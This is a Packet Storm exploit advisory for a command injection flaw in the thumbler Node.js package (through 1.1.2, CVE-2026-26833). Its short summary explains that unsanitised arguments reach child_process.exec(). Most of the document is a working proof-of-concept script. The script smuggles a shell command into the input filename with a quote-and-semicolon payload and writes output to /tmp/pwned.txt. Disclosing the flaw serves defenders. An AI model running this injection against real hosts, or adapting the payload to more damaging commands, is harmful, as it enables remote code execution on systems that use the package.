Share
## https://sploitus.com/exploit?id=PACKETSTORM:219864
==================================================================================================================================
    | # Title     : thumbler โ‰ค 1.1.2 Command Injection in thumbnail() Leading to Remote Code Execution                               |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://github.com/mmahrous/thumbler                                                                             |
    ==================================================================================================================================
    
    [+] Summary    : The thumbler package (through version 1.1.2) contains a critical command injection vulnerability in the thumbnail() function. 
                     User-supplied input parameters (input, output, time, size) are concatenated into a single ffmpeg command string and executed via child_process.exec() without proper sanitization.
                     An attacker can inject arbitrary shell commands by crafting malicious input, leading to remote code execution (RCE) on the host system with the privileges of the Node.js process.
    
    
    [+] POC        :  
    
    // exploit.js
    
    const thumbler = require("thumbler");
    
    
    const maliciousCommand = "id > /tmp/pwned.txt"; 
    
    
    const maliciousInput = `test.mp4"; ${maliciousCommand}; echo "`;
    
    const outputPath = "/tmp/output.jpg";
    const options = {
        time: 5,
        size: "100x100"
    };
    
    console.log("[+] Executing command injection via thumbler CVE-2026-26833");
    console.log("[+] Malicious input:", maliciousInput);
    
    thumbler.thumbnail(maliciousInput, outputPath, options, (err, stdout, stderr) => {
        if (err) {
            console.log("[!] Thumbnail generation failed (but command may have executed)");
            console.log("Error:", err.message);
        } else {
            console.log("[+] Thumbnail generated (injection might still work)");
        }
    
        console.log("[*] Check if the command executed by running: cat /tmp/pwned.txt");
    });
    	
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================